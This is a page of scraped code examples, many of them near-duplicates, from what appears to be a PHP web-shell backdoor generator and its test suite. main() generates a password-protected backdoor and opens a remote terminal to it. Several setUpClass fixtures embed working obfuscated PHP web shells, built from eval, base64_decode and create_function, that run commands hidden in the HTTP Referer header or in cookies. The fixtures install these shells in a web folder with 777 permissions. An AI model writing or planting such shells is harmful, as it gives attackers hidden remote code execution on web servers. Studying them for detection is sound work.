Beispiel #1
0
def main(arguments):

    if arguments.command == 'generate':

        obfuscated = generate.generate(password=arguments.password,
                                       obfuscator=arguments.obfuscator,
                                       agent=arguments.agent)

        generate.save_generated(obfuscated, arguments.path)

        log.info(
            messages.generate.generated_backdoor_with_password_s_in_s_size_i %
            (arguments.password, arguments.path, len(obfuscated)))

        return

    elif arguments.command == 'terminal':
        session = SessionURL(url=arguments.url, password=arguments.password)

    elif arguments.command == 'session':
        session = SessionFile(arguments.path)

    dlog.debug(pprint.pformat(session))

    modules.load_modules(session)

    if not arguments.cmd:
        Terminal(session).cmdloop()
    else:
        Terminal(session).onecmd(arguments.cmd)
Beispiel #2
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions
        if (
            subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip()
            != config.script_folder_expected_perms
            ):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder
            )

        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(
            config.cmd_env_move_s_s % (tmp_path, cls.path),
            shell=True)

        subprocess.check_call(
            config.cmd_env_chmod_s_s % ('777', cls.path),
            shell=True)
Beispiel #3
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.CRITICAL)

        cls._randomize_bd()

        # Check `config.script_folder` permissions, comparing just the
        # last 3 digits

        if (subprocess.check_output(config.cmd_env_stat_permissions_s %
                                    (config.script_folder),
                                    shell=True).strip()[-3:] !=
                config.script_folder_expected_perms[-3:]):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'" %
                config.script_folder)

        obfuscated = generate(cls.password)

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
                              shell=True)
Beispiel #4
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions, comparing just the
        # last 3 digits

        if (subprocess.check_output(config.cmd_env_stat_permissions_s %
                                    (config.script_folder),
                                    shell=True).strip()[-3:] !=
                config.script_folder_expected_perms[-3:]):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'" %
                config.script_folder)

        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
                              shell=True)
Beispiel #5
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.CRITICAL)

        cls._randomize_bd()

        # Check `config.script_folder` permissions
        if (
            subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip()
            != config.script_folder_expected_perms
            ):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder
            )

        obfuscated = generate(cls.password)

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(
            config.cmd_env_move_s_s % (tmp_path, cls.path),
            shell=True)

        subprocess.check_call(
            config.cmd_env_chmod_s_s % ('777', cls.path),
            shell=True)
Beispiel #6
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()

        # Check `config.script_folder` permissions
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip() != config.script_folder_expected_perms):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder)

        obfuscated = generate(cls.password)

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
                              shell=True)
Beispiel #7
0
    def test_generators(self):

        for i in range(0, 500):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)
            self.channel = Channel(self.url, self.password, 'StegaRef')
            self._clean_bd()
Beispiel #8
0
    def test_generators(self):

        for i in range(0, 500):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)
            self.channel = Channel(self.url, self.password, 'StegaRef')
            self._clean_bd()
    def test_generators(self):

        for i in range(0, 100):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)

            self.channel = Channel('ObfPost', {
                'url': self.url,
                'password': self.password
            })
            self._incremental_requests(10, 100, 30, 50)

            self._clean_bd()
Beispiel #10
0
    def test_generators(self):

        for i in range(0, 100):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)

            self.channel = Channel(
                'ObfPost',
                {
                    'url' : self.url,
                    'password' : self.password
                }
            )
            self._incremental_requests(10, 100, 30, 50)

            self._clean_bd()
Beispiel #11
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions, comparing just the 
        # last 3 digits

        if (
            subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip()[-3:]
            != config.script_folder_expected_perms[-3:]
            ):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'"
                % config.script_folder
            )

        obfuscated = """<?php
$xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam";
$dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP";
$lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ==";
$tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc";
$toja = str_replace("z","","zsztr_zrzezpzlazce");
$apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe");
$fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn");
$sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify();
?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(
            config.cmd_env_move_s_s % (tmp_path, cls.path),
            shell=True)

        subprocess.check_call(
            config.cmd_env_chmod_s_s % ('0777', cls.path),
            shell=True)
Beispiel #12
0
    def setUpClass(cls):

        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions, comparing just the
        # last 3 digits

        if (subprocess.check_output(config.cmd_env_stat_permissions_s %
                                    (config.script_folder),
                                    shell=True).strip()[-3:] !=
                config.script_folder_expected_perms[-3:]):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'" %
                config.script_folder)

        obfuscated = """<?php
$xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam";
$dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP";
$lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ==";
$tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc";
$toja = str_replace("z","","zsztr_zrzezpzlazce");
$apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe");
$fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn");
$sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify();
?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
                              shell=True)
Beispiel #13
0
def main(arguments):

    if arguments.command == 'generate':

        obfuscated = generate.generate(
            password = arguments.password,
            obfuscator = arguments.obfuscator,
            agent = arguments.agent
        )

        generate.save_generated(obfuscated, arguments.path)

        log.info(
        messages.generate.generated_backdoor_with_password_s_in_s_size_i %
        (arguments.path,
        arguments.password, len(obfuscated))
        )

        return

    elif arguments.command == 'terminal':
        session = SessionURL(
            url = arguments.url,
            password = arguments.password
        )

    elif arguments.command == 'session':
        session = SessionFile(arguments.path)

    dlog.debug(
        pprint.pformat(session)
    )

    modules.load_modules(session)

    if not arguments.cmd:
        Terminal(session).cmdloop()
    else:
        Terminal(session).onecmd(arguments.cmd)
Beispiel #14
0
 def setUpClass(cls):
     cls._randomize_bd()
     obfuscated = generate(cls.password, agent='legacycookie_php')
     save_generated(obfuscated, cls.path)
Beispiel #15
0
 def setUpClass(cls):
     cls._randomize_bd()
     obfuscated = generate(cls.password, agent='stegaref_php_debug')
     save_generated(obfuscated, cls.path)
Beispiel #16
0
 def setUpClass(cls):
     cls._randomize_bd()
     obfuscated = generate(cls.password, agent='legacycookie_php')
     save_generated(obfuscated, cls.path)
Beispiel #17
0
 def setUpClass(cls):
     cls._randomize_bd()
     obfuscated = generate(cls.password, agent='stegaref_php_debug')
     save_generated(obfuscated, cls.path)